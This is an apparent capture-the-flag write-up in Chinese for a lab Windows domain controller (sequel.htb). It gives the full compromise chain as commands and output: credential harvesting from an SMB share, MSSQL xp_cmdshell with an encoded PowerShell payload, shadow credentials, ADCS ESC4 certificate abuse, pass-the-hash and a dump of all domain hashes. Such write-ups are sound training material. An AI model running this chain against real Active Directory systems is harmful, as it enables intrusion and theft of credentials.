基本信息

1
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

端口扫描

没有web,1433以及其他常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$ nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-13 13:23 CST
Nmap scan report for 10.10.11.51
Host is up (0.081s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 05:09:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T04:17:33
|_Not valid after: 2055-01-13T04:17:33
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m37s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-01-13T05:10:06
|_ start_date: N/A
|_clock-skew: mean: -15m36s, deviation: 0s, median: -15m36s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.98 seconds

得到的主机名添加hosts:

1
10.10.11.51 sequel.htb dc01.sequel.htb

bloodhound

使用给出的初始账号密码收集bloodhound信息:

1
bloodhound-python -u rose -p KxEPkKe6R8su -d sequel.htb -ns 10.10.11.51 -c All --zip

没有从rose直接可以利用的路径:

usernames

可以从bloodhound整理,也可以这样:

1
2
3
4
5
6
7
8
9
10
11
12
faketime -f "-15m36s" nxc smb dc01.sequel.htb -u rose -p KxEPkKe6R8su -d sequel.htb --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
michael
ryan
oscar
sql_svc
rose
ca_svc

SMB

smb可以看到一些非默认共享:

1
python3 examples/smbclient.py rose:'KxEPkKe6R8su'@10.10.11.51

Accounting Department

Accounting Department中有两个xlsx文件,下载下来查看,excel打不开,直接解压查看其中内容,其中一个文件中得到一些账号密码:

1
2
3
4
5
6
7
unzip accounts.xlsx
cat xl/sharedStrings.xml

angela 0fwz7Q4mSpurIt99
Oscar 86LxLBMgEWaKUnBG
Kevin Md9Wlq1E5bZnVDVo
sa MSSQLP@ssw0rd!

mssql

上面得到的密码中,sa仍然有效,连接mssql,常规xp_cmdshell,得到sql_svc:

1
2
3
4
5
python3 examples/mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51

enable_xp_cmdshell
xp_cmdshell whoami
xp_cmdshell powershell -e JABjAGwAa<payload>pAA==

但缺所需权限,并不能直接常规pototo到system,继续翻文件,在配置文件中得到密码:

1
2
3
PS C:\SQL2019\ExpressAdv_ENU> type sql-Configuration.INI

WqSZAF6CysDQbGb3

ryan & user flag

枚举可以发现ryan复用了sql_svc密码:

1
2
3
4
5
6
7
nxc smb 10.10.11.51 -u users.txt -p WqSZAF6CysDQbGb3 -d sequel.htb --continue-on-success

...
SMB 10.10.11.51 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
...
SMB 10.10.11.51 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
...

ryan在remote management组中,直接winrm登录:

1
evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

CA_SVC

ryan对ca_svc有writeowner权限:

那就是ryan把自己设置为ca_svc的owner,修改权限,然后任意操作:

1
2
3
4
5
6
7
8
# 设置owner
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan
# 修改权限
python3 examples/dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
# 常规shadow creds
faketime -f "-15m36s" certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc

[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

ADCS

ca_svc是ADCS服务账号,后面就是常规ADCS,发现ESC4:

1
2
export KRB5CCNAME=ca_svc.ccache
faketime -f "-15m36s" certipy find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

ESC4

后面就是一步步:

1
2
3
4
5
6
7
8
9
10
# 更新模板
faketime -f "-15m36s" certipy template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

# 请求证书
faketime -f "-15m36s" certipy req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51

# 使用证书认证
faketime -f "-15m36s" certipy auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51

7a8d4e04986afa8ed4060f75e5a0b3ff

root flag

使用得到的hash登录:

1
evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
python3 examples/secretsdump.py Administrator@10.10.11.51 -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::
sequel.htb\michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::
sequel.htb\ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::
sequel.htb\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::
sequel.htb\ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::

参考资料